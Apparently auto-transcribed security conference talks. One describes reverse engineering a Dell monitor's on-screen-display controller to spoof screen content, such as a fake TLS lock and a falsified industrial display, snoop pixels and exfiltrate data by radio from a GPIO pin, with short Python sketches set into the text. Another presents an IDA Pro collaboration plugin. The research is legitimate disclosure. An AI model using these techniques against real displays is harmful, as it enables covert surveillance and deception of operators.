It's very slow. It is like... So it's like one kilobyte every 8 minutes or something? Yeah, I was able to dump. Because every 120 bytes requires like 12 messages on the USB bus to get, right? And you can only extract up to 120 bytes. It says 127, but something weird comes out. So while these guys are doing this, I'm mucking with the hardware. So I figure maybe there's a way to do something with hardware. Maybe we can play with the GPIOs. Maybe we can exfiltrate data using something else aside from USB. Maybe we can find a GPIO that we can repurpose. So I just use everything that's available. And I flip the pins until I finally found something. I found one pin we can actually flip. There's probably more out there. We figured out there's more later. But at this point, I have one. So with one, I can do async serial or something like that. And then I can exfiltrate data at maybe like a megabaud or something, which I did. And we also figured we might as well just hijack the printf function and do some dynamic analysis and have a look at what's happening in the monitor in real time and extract some strings, because we had no UART by then. We couldn't find it. Maybe you guys can find it if you play with it. Maybe it's there. But at this point, we actually see some activity when we press buttons. This did not take us anywhere, but it still was worth a shot. So Francois literally walked off and said, like, guys, I'm just going to go reimplement UART in GPIO in this monitor. I'll be back in a day. Bye. Right? And it worked. How cool is that? Okay. So we did some dumps, dynamic data coming out of the monitor finally. And we realized, also with a little bit of Googling, we realized we were really wrong about what we thought about this firmware. It's not OSD firmware. That was a misnomer. It really is the OCM executable. OCM stands for On-Chip Microcontroller. And it turns out there is an OSD, but inside the SoC, the OCM and the OSD are two separate computing devices. There are effectively two cores running. And the red part is what's called IROM. And the purpose of IROM is that it's an actual ROM that sits inside the chip and acts as a driver that allows the OCM controller to connect to and work with the OSD controller, which is all done through shared memory and DMA. So it's basically a tiny little network inside a tiny little I2C network on a monitor. And there are so many cool things to do in this monitor. You can actually do PIP, picture-in-picture, which is a display inside itself. Like you can display two screens in one go. Yeah. And then we had that and we Googled for like a million years, right? And then we found this piece of gold. It's, what is it, doc88.com. It's definitely a place where you want to go to and click on links in a VM. But you should click on every single link because it's such a great website. But it does have a data sheet for exactly the chip that we're looking for. So with this chip and with this data sheet, we learned a ton about the internals and all the registers and stuff that we never thought we would find in a tiny little microcontroller inside the monitor. So with that, with the document, with physical access, with code execution, we're ready to put at least a single pixel on the screen, the color we want, the location we want. So we're like, let's display a picture. There are only three questions we have to ask, right? What's the first question? We have to transfer the image, right? And the second question is, like, how do you display the transferred image once you get it there? And the third one.
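As an aside on the GPIO serial exfiltration just described: bit-banged async serial on a single pin is nothing more than timed level changes. A minimal sketch, where `set_pin` stands in for whatever register write actually drives the pin and the baud rate is purely illustrative (the real implementation would use busy loops on the microcontroller, not `time.sleep`):

```python
import time

def send_byte(set_pin, byte, baud=9600):
    """Bit-bang one byte as 8N1 async serial on a single GPIO.

    set_pin(level) is assumed to drive the pin high (1) or low (0).
    """
    bit_time = 1.0 / baud
    bits = [0]                                    # start bit
    bits += [(byte >> i) & 1 for i in range(8)]   # data bits, LSB first
    bits += [1]                                   # stop bit
    for bit in bits:
        set_pin(bit)
        time.sleep(bit_time)

def send_buffer(set_pin, data, baud=9600):
    for b in data:
        send_byte(set_pin, b, baud)
```

(The third question, picked up next, is the color format.)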
And also, what about the colors? We don't know how the colors work. Yeah. Is it like a compressed image? Is it a JPEG? What is the format of each pixel? What is the format of the image, et cetera? So we thought we would look at, if you plug the power into the monitor and nothing happens, you don't connect anything to it, the Dell logo comes up. This is kind of like the monitor's boot screen. And we saw that and we're like, well, this thing must be in the firmware, right? And after many constructive, sober and entirely productive discussions between Jada and I, we were just looking at the static stuff and Jada's like... That's obviously code. Yeah. So maybe that's a picture. Who knows? But I'm like, well, but look at all this. Like, what is that, right? Maybe that's a thing. Maybe a menu or something. Right? And if you stare at this thing for long enough, I don't know why it does this to me, but it does like crazy things that people bring. It gets you more drunk. All right. So we're doing this in Francois, right? Yeah. So these guys like to stare at things and hallucinate. I prefer to just press buttons and see what's happening. So I'm pressing buttons and I'm dumping at the same time because I have the sweet dump for now. So I'm dumping all this information, trying to compare what's happening in RAM, what's stable and what's changing to see if we can get a better picture of what's happening. So a lot of great dynamic data as things are happening, as menus are coming up and down. So then we get this, which I don't see anything in there, but Jordan's been analyzing all this information for so long and he just comes and points this to me. Francois, that was definitely a command structure. Obviously. Don't you get that? So this is a command control structure for the OSD. You can specify the coordinate system and the size of the image which you want to display. Which color do you want? And you can also compress the image and expand it in the OSD itself. So this is an adjust. It works. The OCM talks to the OSD, sends commands, sends data, send control structures and font structures. There are like three or four structures you send through DMA engine. And that's how we fixed our transfer and display image. And this is a control structure. If you pass this, you will be able to display blinking box and get epilepsy or something. But so there are two APIs which are required, which is SDRAM read, through which you can read what is in the OSD SRAM and the write API. And that's what happens. So now we're getting better at doing this. It's getting puke here. But it's still blinking. Again, no idea why. It's way to do. Yeah, it's blinking faster now. Hey, Jordan, why does it blink faster than before? I don't know how to click. And we also have no idea why it blinks. But it's really gross if you look at it. Does make you nauseous. So you see this, I'm able to move the command box now. And I was really happy. And that's weeks of work, by the way. So weeks of work and we get a pink box. We're pretty proud of ourselves here. Okay, so we got one and two down. All we need to know is how to form a picture. What is the color? How do we pack that data? We're done. We can display whatever we want. So we fill the buffer with incrementing values starting from like zero, one, two, three. And then we got that, which is definitely not what we expected. Because we were expecting maybe very slightly different colors because we're moving one byte at a time, changing one bit, really. But that's not what happened. 
So we looked at that. We're like, OK, we don't understand. But science time, because we're scientists. So we took a microscope and we put it right on the monitor. We're like, we're going to display a byte. We're going to look at exactly what comes out of the eight pixel. And we're going to figure this one out. We can even decode the color, get a colorometer in there, and we're just going to do it. Obviously on top of an Ida book. Yeah, exactly. That's also, and also like, I don't even, the other one. Oh, it's not as, it can't be the C book. That's gross. Okay, so I've never seen this before. And I thought that's really cool because you're literally seeing the R, right? Which is dark, the G and the B. Like those three things is a single pixel cell. And the value we put up there is all X through three, all X through three, three, three, three, three, three. So same color, same pattern. It's like, now we get each individual RGB, RGB value through this little microscope. And that's what we got. Okay, so instead of the same value, we said, OK, let's just do three, three, zero, zero, three, three, zero, zero. And this is what we got here on the microscope. So for one super amazing thing, right, that we're going to run our demo on, you win this if you answer this question, right? Okay. How many bits per pixel is it? Anyone? Six? No. Yeah. So we were putting in the word three, three, zero, zero, three, zero, zero, and we're getting this thing on the screen. Who said four bits? You got it. Four bits. Like, can you do actually do it with four bits per pixel? But I thought like in normal world, you do it with 32 bits, right? There's 8-bit R, there's 8-bit green and 8-bit blue and 8-bit alpha. So how can you encode using 4-bit? Obviously, like you have to use some kind of color lookup table and we went through the documentation. That's what they use. This is, so you get access, with the 4-bit system, you get access to 16 arbitrary 32-bit colors. So you can display any color of your choice, 16 colors of your choice, right? And zero, we found out later that it is a transparency. So where is the color lookup table on? Actually, go back. And what we found is that, okay, you can only have 16 colors, but each color is actually 32-bit deep. All right, so you can do all the colors you want. You're just limited by the number of colors you can use in any image. Okay, all right, so, cool. Let's find a color lookup table, let's modify it. Let's see if we can change the colors now. Okay? And then we're like, well, how do we do that? And then, you know, friends, what comes up? Yeah, of course, I'm obsessed, or so it seems. So I'm just, but at this point we found out there's an external SD RAM, which is like more data to dump. So I perfected the procedure and now we can dump 128 megabytes of external SD RAM and just try to see what's in there if we can find images or if we can find more. And we did continue, we all continued to work. We did see that the OCM firmware is mapped in SD RAM, so definitely it's also X186. Right? So we also work really hard while you're doing this, right, obviously. Okay, so this went on for a long time. And like two days later, we all find what we're looking for, like, oh, that's what it is. And it turns out it's exactly the same, okay? So it's the same as how the command goes from the OCM processor to the OSD. Basically there is a color lookup table that sits inside the OCM firmware. 
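The 4-bits-per-pixel format with a 16-entry, 32-bit color lookup table is easy to mirror on the host side. This sketch is not the monitor's actual encoder; it just follows the format described above, building a palette from an RGBA pixel list and packing two indices per byte, with entry 0 reserved for transparency. The nibble order is an assumption.

```python
def pack_4bpp(pixels):
    """pixels: list of (r, g, b, a) tuples, at most 15 distinct opaque colors.

    Returns (palette, packed): palette is 16 32-bit ARGB entries with entry 0
    transparent, packed holds two 4-bit palette indices per byte.
    """
    palette = [0x00000000]                     # index 0: transparent
    lookup = {}
    indices = []
    for r, g, b, a in pixels:
        if a == 0:
            indices.append(0)
            continue
        key = (a << 24) | (r << 16) | (g << 8) | b
        if key not in lookup:
            if len(palette) == 16:
                raise ValueError("more than 15 opaque colors")
            lookup[key] = len(palette)
            palette.append(key)
        indices.append(lookup[key])
    if len(indices) % 2:
        indices.append(0)                      # pad to a whole byte
    # nibble order (first pixel in the high nibble) is an assumption here
    packed = bytes((indices[i] << 4) | indices[i + 1]
                   for i in range(0, len(indices), 2))
    return palette, packed
```

On the monitor side, the equivalent table is the color lookup table sitting in the OCM firmware.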
A function loads it, sets up a DMA engine, and there are four DMA engines inside this little processor, and it puts it into the SRAM and the OSD picks that up, departs it, and does its magic. Okay? All right, so this is where we went, okay? Like we actually were able to frame, like form our own image, we were able to load it and display it, put it wherever we want. So we made this cool unicorn, and instead of a rainbow, it has a tiny little SSL locks that comes out of it. Because now we can do as many SSL locks as we like, we can put it anywhere we want, and that's why this unicorn is magic. I mean, all this work for just making a unicorn fart. Yeah, but with locks for crypto, right? That's good. Okay, so at this point, you know, I'm pretty happy, I'm not working, right? It's like very late at Friday night. I go to John and I'm like, John, the SSL lock only has 16 colors, it doesn't look great, you know? We need more colors. It's so hard on, it's really hard. But we looked around and we saw that the hardware does support up to 8-bit per pixel. We, like, instead of finding this, I found a break point. So 8-bits, right, that allows you to have instead of 16, 256 colors, which is definitely enough for that SSL lock. And instead of that, I found how to put break points on the chip, and then we can do dynamic analysis and figure out, like, how every code is working. So you can also do code patch. So if we would have found this before, instead of, like, a one and a half month work, it would have been only a week maximum? Yeah, so we found this, like, when we're 95% done with this work, right? And if we use this from day one, it would have been so much less painful. But it's just we have to scroll through all the pages manually. It's not a PDF, so it loads slowly one page at a time. And you have to give them e-gold to download it, or whatever, like, Aligot or something. It's terrible. Right? Right? So we're really happy. We're like, break point for the win. We could now stop working, right? Yeah, so of course I don't drink, so I just keep working with the, and I need someone to work with. So I get some interns, and we just keep working at it until we figure out pretty much everything, except for the 256 colors. But that'll come. And at this point, yeah, I'm dumping more and more, and to the point where we actually can put an API together and get something working. So we have all the stuff that we're going to show, and some more, and to the sweet API that you can just call and show some stuff on the screen, and whatever you want to do. Yeah, so the API lets you load an image, put it to a different place. We have a really cool thing I'm not going to talk about until later, but actually it's literally the next slide. We found this really amazing treasure, okay? So somewhere deep in the code, there's this function called grabPixel, right? You know, the entire time our expectation was that the OSD's job is to put pixels on the screen, to overlay menus and whatever. But apparently it can also see every pixel, too. Why it has that power? I don't really know. It's cool. The fact that it's there means you can have a piece of software that looks at the screen and also manipulate the screen. So use your imagination, right? Maybe you can track where things are on the screen and change them dynamically. Who knows? So in the end, in review, right, we were able to change every pixel. We can see every pixel on the screen. And there's this other thing we did called Fontana. 
I don't really have much time to, actually, a little bit of time. So the idea of Funtenna is to take software, right, and use the very ubiquitous hardware you find on all these embedded devices in order to turn those devices into data transmitters, radio data transmitters. And in this case, we adapted Francois' code. So we found a GPIO with a longer trace or a longer cable on the board, which was long enough for us to transmit something probably a few meters away. So probably outside this room or something like that. Yeah. So we're flipping just a single GPIO pin. And this is kind of cool because this is building off of the Markus Kuhn stuff he did, right, from van Eck phreaking to doing van Eck phreaking on LCDs. And here, we now have the power to compute on the data on the screen and then use the screen itself to actively transmit not just the raw content of the screen, but the computed metadata that you find on the screen. And over here is a cheap TV antenna, right? That's an SDR, and we're transmitting at somewhere like 16 megahertz, right? So that's cool, too. So that code is also in the GitHub. Okay. So enough talk. We're going to... Run some live demos. Okay. Jatin, take it away. So this is, I think, Bonadou again. Can we put it to the TV? Okay. Give me a second. Yeah, that works. Okay. So the first attack, we call it... It's a very special attack. We call it a check attack. If you remember from our presentation, there is an area man of concern, Shiky. And so I'm going to just execute it. He promised... He made us promise that we wouldn't use this for the demo. But here it is. Yeah. Sorry. Oh, I should also explain that's a USB Armory, right? With all of our POC code. It's basically running Linux, and it's just doing all the USB traffic that we were talking about before. So if you want a random guy just... Watching you? Watching you. Use our API, download it on GitHub. And you're getting this picture out. You can't get rid of him. He's there to stay. That's Creative Commons. It's out there. It's done. Let me clear this attack. It's very... All right. I'm going to do a second one. Okay. So, let me go and get a very informative discussion website. Oh, wait. Whoa. Oops. That's our next demo. Okay. Sorry. I have to... Okay, so as we all know about this... Sorry. This website, it has... It is very informative, as I have learned all these years. But it is missing... It has always missed one thing, which is TLS. Let me give it that. Yeah, let Jatin do that for you. Right. There you go. And it has TLS. Yes. Yay. Everything is secure now. Whatever you see. Everything is okay. Everything is okay. All right. Let's set up the last demo. Okay. So, this is... So, this is just a screenshot. Okay. There's no factory behind this thing. But maybe you guys are familiar. This is what a typical HMI, a human-machine interface, will look like. It's a graphical interface to something like an industrial process. So, you have computers controlling flow rates of tanks and blah, blah, blah. And they're all reporting back real-time status. And generally speaking, green is good, red is bad. And when you have a red light on a big tank or whatever, it's probably something you should look into. And people probably freak out. So, just look at the screen. Okay. And we'll see what happens. Oh. Did you see it? Did you catch it? There you go. Right. So, instead of going after the HMI, the PLCs, the network, you know, what if you wanted to influence human behavior just on the monitor?
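Coming back to the Funtenna transmitter from the start of this demo section: keying a GPIO at a fixed rate so its trace radiates a weak carrier can be sketched as simple on-off keying. This is only a structural illustration, with `set_pin` a placeholder for the real register write; Python timing is nowhere near fast enough for the frequencies the actual implementation toggles at.

```python
import time

def transmit_ook(set_pin, data, carrier_hz=1000, bit_time=0.01):
    """On-off keying: toggle the pin at carrier_hz for a '1' bit,
    hold it low for a '0' bit. A receiver such as an SDR demodulates
    the presence or absence of the carrier back into bits."""
    half = 1.0 / (2 * carrier_hz)
    for byte in data:
        for i in range(8):
            bit = (byte >> (7 - i)) & 1
            end = time.time() + bit_time
            if bit:
                while time.time() < end:      # radiate the carrier
                    set_pin(1)
                    time.sleep(half)
                    set_pin(0)
                    time.sleep(half)
            else:
                set_pin(0)                    # silence for the bit period
                time.sleep(bit_time)
```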
I mean, good luck tracking that down. Right. And here it is. Right. So, that's our demos. No, wait. We have one more to that. Oh, that's right. That's right. Yeah. Oh, that's just for fun. That's our proof of concept. We just put it in there. Right. Oh, it's the unicorn. Demands obedience. And we got it wrong the first time. You can see, like, the image is not square properly. Yeah, this is a proof of concept. It's the first one. Okay. So, you know, let's talk a little bit about implications of this thing. You know, how big is the problem? Okay. So, we actually had some folks look into the business end of this. And we estimate that over the last 10 years, we've made over a billion monitors. Right. And I would guess, you know, by and large, the majority of the monitors that we have work in some way very similar to this Dell monitor. In the sense that it has an OSD controller, it could put a menu thing on the screen. And it runs software, right. That drives that system. So, yeah, pretty much every one of your monitors is probably vulnerable to this or some variant of this today. Right. That's a problem. And, you know, how practical is this attack for, you know, how practical is the tax vector? So, if you notice, the way we did this attack, we had to physically plug in a USB cable, right. And that's how the USB to I2C interface worked. But keep in mind, the one, the DDC2BI and the DDC commands were originally designed to be able to go back over all of the data channels, including VGA and HDMI. So, there's also a possibility that that command can go through that data channel. And also, right, as soon as you have access to the I2C bus, right, even if you didn't have a legitimate, you know, bridge that got you there, however you got, however you get there, as long as you're on the I2C bus and you're working with something similar to this, right, you should be able to, you know, do something like what we've done here. And if you notice the very modern, the very new, you know, 34-inch curve monitor with the USB to I2C solution, right. I mean, that tells me that maybe the board is not exactly the same, maybe the firmware versions are different, but today we're still using this methodology of, you know, getting some bridge to talk to I2C in order to talk to these on-screen controllers to do something like a firmware update. And so, here's the big one. How realistic would the fix be if there was a fix? You know, I thought this went through a little bit, right. So, in order to fix this thing, you either have to do something like a physical recall of, like, a billing monitors, which is never going to happen, or you're going to have to release a software update to fix the issue, which means probably you're going to have to do something similar to our, you know, our path, right, or you're going to have to release the firmware update process, right, to all of the users of the world, which will actually help the adversary, the bad guys, faster than it helps the good guys, right. Because, you know, the reason why we can't do this on a hundred different models today is because we don't have a hundred monitors. But if you release the way, you know, firmware update is done on everything, then that's probably not good. So, the way we fix it is going to be slightly tricky. And we haven't put the code up on GitHub, but we're going to not be lame. We're actually going to do it today. So, that's supposed to be a link, but we're definitely going to do it. 
And this is like, you know, like Francois said, all of the code that we came up with, all the code that, you know, ran in this demo, and a lot of documentation of the APIs that we found, you know, ways of using graphics, so ways of displaying images, and ways of doing Fontana and all that stuff. You know, so lastly, right, please contribute if you like this work, you know, take apart your monitor, take apart your friends' monitors, right, see what's inside. Because, you know, this is one data point, and obviously there are thousands of different manufacturers for monitors, and probably tens of thousands of different firmware versions, blah, blah, blah. But, you know, if we started getting more data points, we'd probably get a better idea of, you know, how widespread this type of attack can be. And, you know, lastly, right, like we're now entering a time, you know, where we probably have to dial the pixels coming out of our screen, as just yet another security problem we have to worry about, right, and that's not great. So, you know, if we can come together and try to fix this problem in some tangible way, that would be most excellent. So, in conclusion, right, there are happy endings to the story. We spoke to Dell, and as of yesterday, Dell has not released a security update to fix the shack attack, so that's still going to happen. And many monitors were harmed in the making of this presentation. And, but the happy ending is that Chris now lives happily with his semi-unmodified 34-inch monitor. So, he got that one. Now, that's not dead. So, that's it. Questions? Yes. Oh, yo, hi. Yeah, thanks for the picture. We never met, you totally just made that one up. Sorry. Yeah, first question. How much alcohol was consumed during your work? John, what do you think? How much alcohol is consumed during the making of this presentation? 25 bottles of wine. I don't know. I would say that. Two bottles per day? We don't, you know, it's, it clearly got the job done, so we're good. Yeah. Yeah, and second, you mentioned that you have to use USB, but did you look into, like, using just the video card to talk directly to DC? So, that's the next thing that we would look into? We started to look at it, actually. Yeah. We didn't get a chance to finish it. So, yeah. That's a big open question, right? And I, like I said, you know, any peripheral on the monitor that gets you onto the I2C bus, no matter what way you do it, right, will probably be able to get you to this goal. Any other questions? I guess let's drink. Yeah? Okay, we're done. Thank you. Thank you. Thank you.
|
There are multiple x86 processors in your monitor! OSD, or on-screen-display controllers are ubiquitous components in nearly all modern monitors. OSDs are typically used to generate simple menus on the monitor, allowing the user to change settings like brightness, contrast and input source. However, OSDs are effectively independent general-purpose computers that can: read the content of the screen, change arbitrary pixel values, and execute arbitrary code supplied through numerous control channels. We demonstrate multiple methods of loading and executing arbitrary code in a modern monitor and discuss the security implication of this novel attack vector. We also present a thorough analysis of an OSD system used in common Dell monitors and discuss attack scenarios ranging from active screen content manipulation and screen content snooping to active data exfiltration using Funtenna-like techniques. We demonstrate a multi-stage monitor implant capable of loading arbitrary code and data encoded in specially crafted images and documents through active monitor snooping. This code infiltration technique can be implemented through a single pixel, or through subtle variations of a large number of pixels. We discuss a step-by-step walk-through of our hardware and software reverse-analysis process of the Dell monitor. We present three demonstrations of monitoring exploitation to show active screen snooping, active screen content manipulation and covert data exfiltration using Funtenna. Lastly, we discuss realistic attack delivery mechanisms, show a prototype implementation of our attack using the USB Armory and outline potential attack mitigation options. We will release sample code related to this attack prior to the presentation date.
|
10.5446/32748 (DOI)
|
This morning we have a talk on a collaborative solution for IDA to start things off. So thanks everyone for making it out here to recon. So, Solidarity. Who are we? My name is Markus Gaasedelen. I'm a security software engineer at Microsoft. And I'm Nick Burnett and I am currently a student at RPI. So if you don't know already, this talk is almost purely about IDA. IDA Pro, if you don't know, is a disassembler developed by Hex-Rays, who are here somewhere. So I'm sure all of you know what it is. You probably all have a license, hopefully. So just to give some background on our project and the history of collaborative reverse engineering in the context of IDA Pro, we have a little timeline here. I don't want to go into the specifics of the individual projects too much because this is only a 30 minute talk. So way back in 2005, we first saw IDA Sync by Pedram. That was a very simple solution. You guys can Google some of these if you want. It's pretty interesting to look back on the history. CollabREate is the one that everyone probably knows and talks most about. They're all like, hey, you know that one IDA syncing solution that was really crappy and crashed all the time? That was collabREate. That was by Chris Eagle and Tim Vidas, I think, right? So what's interesting about these two projects though is that this was way back and these projects were attempting real time syncing. They were kind of what we call a push-based model. But then we started seeing other solutions coming through such as BinCrowd and CrowdRE, IDA Toolbag, IDASynergy. And all of these solutions were pull slash version control, SVN, Git-based. You would commit or you would push your changes up by hand and other people would have to pull them down by hand. And it was very strange, you know, kind of what happened here. And I like to say we stopped dreaming, right? But it also might have been the fact that IDA wasn't quite ready. IDA's API wasn't in a place where it could support real time collaboration. Well, real time event capture to the degree that was needed for accurate event syncing, or how developers would need it. So version control, you know, now talking about why version control was bad: version control is a medium to document the process of creation, right, for source control. You're developing code, you're writing code. But reverse engineering is an exercise in discovery and digital cartography, right? You're trying to understand what this binary is, what this blob is. You're trying to document it. You're not writing code. You're not developing a system. So, you know, pull and version control, SVN, Git, that seemed very strange as a medium for, you know, storing and maintaining notes and whatnot. So here we are at recon 2016 and we are unveiling Solidarity, a personal project that we've been working on for about a year. Year and a half. Yeah, about a year, since about last June. So, Solidarity. We started off with these initial goals right here. You know, four key kind of central goals. The first was we want to sync IDA databases in real time, right? We play lots of CTFs. We're very fast paced. We, you know, we need to be able to share information instantaneously. And we also want to say, hey, can we sync Hex-Rays in real time too? You know, that was something that... there is no way collabREate would be able to do that. CrowdRE kind of touched on some of that stuff a little bit. But then again, that also was more of a kind of a pull-based model. And then I said, I want user cursors to dance on IDA's nav band.
So, IDA's nav band is the thing at the top of IDA. If you've seen it, it's always usually blue or whatever. Most people just ignore it. But I was like, I want to see multiple users working on the same database and I want to see where they are in the database on that nav band. And then the last point was it has to work, right? I don't want another tool that, you know, kind of half works and doesn't and whatnot. So, we started out, you know, we took the first goal. This is June last year. And this is a little gif of it. You see a very quick demo. It worked then. It was just a very simple demo, a proof of concept. You know, we sat down really in a couple hours like, oh man, like, you know, this is like syncing atomic user actions between databases. We're just like renaming a function call here. And we're like, wow, that's so easy. We'll be done by DEF CON finals, I said. That was June 2015 and we are still working on this. So, you know, the first attempt was very simple. You have two IDA Pro instances, or Solidarity clients as we'll call them for now. This was like version one of Solidarity. We've gone through probably about three huge architecture overhauls. And so syncing atomic user actions between databases, that is actually really easy if you put in some time and effort. But then, you know, and this is just between two databases, two users, right? You just both load the same database and both are like, all right, let's type in each other's IPs and connect. And, you know, that wasn't hard. But there are a lot of added complexities. You start to realize that, okay, you don't actually just want to sync databases. There's a lot, a lot more. Like, how do you ensure that everyone starts out in sync, right? So, you just have this very simple idea of if we just sync every event, everything will be okay. But how do you even make sure that everyone is on the same page before you start syncing events, right? So, people are going to be going to sleep and waking up during CTFs, like having different states of their database, you know, you need the same base to start from. And so, that's just one thing. Coordinating and routing multiple sessions at once. What if you want multiple people working on different challenges at the same time across the same server? What if they're, you know, how do you have like five people working on the same binary? You can't really do that with the, you know, that single pipeline we had before. And then capturing only the correct database events. So, IDA's notorious for its auto analyzer, at least in this space of... Collaborative. Yeah, of collaboration. Almost every project has struggled with the auto analyzer because the auto analyzer is kind of like a one-way hash function. Like, you say, hey, define a function here, and it will go through your database and just start modifying the database and doing all this crazy stuff and there's no way to go back. And that's why there's no undo. You only go forwards. And so, a lot of people struggle to actually differentiate between what the user is doing and what the auto analyzer is doing to the database. So, you know, in our naive initial attempts, we had no idea about the auto analyzer and all that crazy stuff. And so, that was one of the big issues that we had to work through and that everyone else that has worked in this space has had to work through. We've come up with some good solutions, but we'll get to that in a little bit.
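To give a feel for what capturing one of these atomic user actions looks like in IDAPython, here is a tiny sketch that hooks rename events and queues them for some network layer to pick up. The callback name and signature can vary between IDA versions, and the queue is only a stand-in for Solidarity's real transport; telling user renames apart from auto-analyzer renames is exactly the hard part discussed above and is not handled here.

```python
import json
from collections import deque

import idaapi

pending_events = deque()

class SyncHooks(idaapi.IDB_Hooks):
    def renamed(self, ea, new_name, local_name):
        # fires when something gets renamed (by the user or the auto analyzer)
        pending_events.append(json.dumps({
            "type": "rename",
            "ea": ea,
            "name": new_name,
            "local": bool(local_name),
        }))
        return 0

hooks = SyncHooks()
hooks.hook()   # start receiving IDB events; hooks.unhook() to stop
```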
We recognized that we needed a platform to build this collaborative environment that we were seeking for CTFs. And instead of just trying to sync information and data and events between databases, we wanted a platform that you could really work together on. And so, this became a platform to enable Ida interconnectivity. And so, we're going to give a brief kind of high-level overview of the architecture that then zooms down. So, you know, you just have a basic central server and client kind of model going on, right? All your Ida clients phone into the server and the server bounces everything and routes traffic accordingly based on different sessions that are going on. And all that, you know, there's nothing too crazy there. But then we start to get to kind of what we actually call the platform. So, you have two major components to Solidarity. You have the client and the server halves. And so, this is kind of the relationship we see between the two halves. So, you have your client operating system, you know, you could be Windows, Mac, whatever, running Ida Pro. And then you have a server OS. We've mostly been using Ubuntu. But it's just essentially we have a twisted, a Python twisted... I have for networking. Yeah, we'll talk about it in a second. Yeah, on the server. We'll get there. And then... And then often on top of these, the server and the client were able to extend them with modules. So, yeah, this is, you know, so we have in the plugin, which is built on top of Ida Pro, which is what we call the Solidarity client itself, and then the Solidarity server. And this whole get up right here is the platform. But then what we do is we actually build modules on top of the platform. So, it's... we actually made an Ida plugin that then has plugins. So, it's kind of funny. And the server has equivalent plugins on its side. So, it's a very interesting modular framework that, you know, you'll see some cool stuff here. So, going into a little bit more detail about the client here, it's written in Python entirely. We actually had to extend Ida Python and flush it out a lot early on, because the event handling stuff was incomplete when we started last year. Now, I think as of 6.8 and 6.9, it is more complete, or if not finished at this point. So, the plugin, the client plugin is entirely in Python, which is different from Collaborate to the past projects, which were built in C. And we actually use... the client is using the Actor programming pattern, if you guys know about that. And it's specifically using the Python library. And so, the Actor programming pattern essentially is... it takes up things into all these different little nodes or modules, and these modules communicate with each other. They pass messages between each other and act on these messages. And so, you know, we have a core kind of module, and this kind of helps load and organize all the other modules, and all these modules can pass messages to each other based on their needs and what they're interested in doing. And so, it's pretty sweet. It's all asynchronous, nothing blocks anything else. And then there's more modules. So, on the server side of the deal, we have... also, it's written in Python, but it's using Twisted, async.io through Twisted to do the networking event loop and to keep things from blocking that way. And so, we can handle all the different clients coming in and route the events, basically. And for the database model, we're using SQL Alchemy to do the... like make the actual ORM modeling. 
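To illustrate the actor-style module layout described for the client, here is a minimal sketch using plain threads and queues. It is not the library Solidarity actually uses; it only shows the "modules own an inbox, pass messages, never block each other" idea.

```python
import threading
import queue
import time

class Module(threading.Thread):
    """A tiny actor: owns an inbox, reacts to messages, shares no state."""
    def __init__(self, name, router):
        super().__init__(daemon=True)
        self.name, self.router, self.inbox = name, router, queue.Queue()

    def send(self, target, message):
        self.router[target].inbox.put((self.name, message))

    def run(self):
        while True:
            sender, message = self.inbox.get()
            self.handle(sender, message)

    def handle(self, sender, message):
        print("%s got %r from %s" % (self.name, message, sender))

router = {}
for name in ("network", "hooks", "ui"):
    router[name] = Module(name, router)
for m in router.values():
    m.start()

# a hypothetical captured event flows from the hooks module to the network module
router["hooks"].send("network", {"type": "rename", "ea": 0x401000})
time.sleep(0.1)   # give the daemon threads a moment before the script exits
```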
And then, so the purpose of the server to route between clients, obviously, but then we also implemented a user management system and a web server to help you sort of like manage the entire system better, and we'll see that a little bit later. Yep. And also, just something that's kind of funny to note is that all of the network communication is over TLS 1.2, and we're like, oh, we should, you know, put a little option there to like make it optional. We're like, oh, no, in the spirit of good security, let's actually force that on so you can't turn that off. So, yeah, we actually, you know, try and instill some good security standards here. So, let's start talking. Let's get into... this is... we don't have a live demo. We have lots of really cool GIFs for you guys, which is basically our demo. So, let's start talking about the modules that extend the platform, you know, that really make up the core of what you guys care about, you know, the syncing and all the really cool stuff. So, the first thing we really needed once we had, you know, kind of established the platform was some way to correlate, you know, these users in these sessions and binaries. So, if you have a binary, right, you need... you want to have like five people working on this binary. So, you know, we basically kind of call this a project. And this is, you know, what becomes the foundation for collaboration. And so, the projects module offers a few features. So, even if you don't want to necessarily work in real time with other people, you might want to share databases with other people. So, the projects module offers minimal functionality of... you can easily upload databases, download databases to the server, and it provides a very easy way within Ida to access and push and like pull databases super conveniently. It's no longer like, hey, what's your IP? Let me netcat my IDB to you. You can just do all this directly from within Ida. So, this is a little demo of it. And so, we're able to, from within Ida, actually go and create a project through this GUI. And we can actually... there's this entire directory structure that we can go in and create new directories and projects in. And then from there, actually upload the database that we're working on right now so that other people can then use it once it's been uploaded. Yeah. And so, you can specify some details about the project or about the IDB so that other people can see it. And then we just upload it right to the server. And it will become instantly available to everyone else who's using the platform. And then, yep, and then to show the analogous of this, the next one we are downloading and opening. So, we have a blank Ida instance and we're going to open from the server directly. Yep. So, here's, you know, a user. I just uploaded something. Someone else is like, all right, hey, I'm going to grab it and, you know, join you. And so, this downloads. And so, now, you could very easily access someone else's IDB that they wanted you to get without having to do anything too complicated and directly from inside Ida. Yep. So, I mean, you know, even without talking about syncing events and, you know, all this and that, we're already, you know, starting to see some great solid, you know, collaboration opportunities right here. But just, you know, the ease of being able to share databases across, you know, anyone that has access to the server, so, like, you know, a CTF team or an instant response team inside some company. Yep. Super convenient. Okay. 
And I quickly just mentioned users. Yeah. Let's see. Yeah. Okay. Yeah. So, because you might have sensitive IDBs and stuff, we've implemented a system so that you can either have open projects, public projects, or private projects, so you can add users to private projects and only they can access them. Just as a protection in case you have sensitive stuff inside your company that only certain people can access and so on. Yep. So, just some basic permissions. All right. So, now, we'll talk a little bit about real time, you know, what a lot of you probably care about. Database event syncing, right? Yeah. So, this is just some more trivial syncing. So, we have two different IDA instances here, both of them connected. You can imagine that they were on different computers, but it was easier this way. Yeah. And so, we're able to do all kinds of different operations in IDA and they will be directly synced between both users in real time. So, yeah, we're just doing some basic renames in this one. Here, we're going to change an operand. So, we change that to 20. You can see these on both sides. So, this is what we call more of the easy syncing GIF. Yeah. Because these are pretty simple operations. They don't have any side effects really. Yeah. They don't tax IDA too heavily. So, this is, you know, stepping up a little bit more. This is like structure creation and changing the types of the different fields in structures. This is a little bit more interesting, a little bit more out of the norm. Very useful though, because structures are often very useful to have for reverse engineering. So, it's great to be able to share them in real time with people working on the project with you. Yep. So, this is just structure creation, you know, defining some fields, renaming some stuff. It's all very quick. We'll just let this play through. How are we doing on time? Oh, we're doing good. We're doing good. So, yeah, pretty cool, pretty convenient. Changing some types on the fields. And I think we end up actually deleting it entirely just for fun. And it's gone. Yeah. Cool. All right. And then something a little bit more advanced here is we're actually going to engage the auto analyzer a little bit by undefining functions. You see both sides have undefined them the same 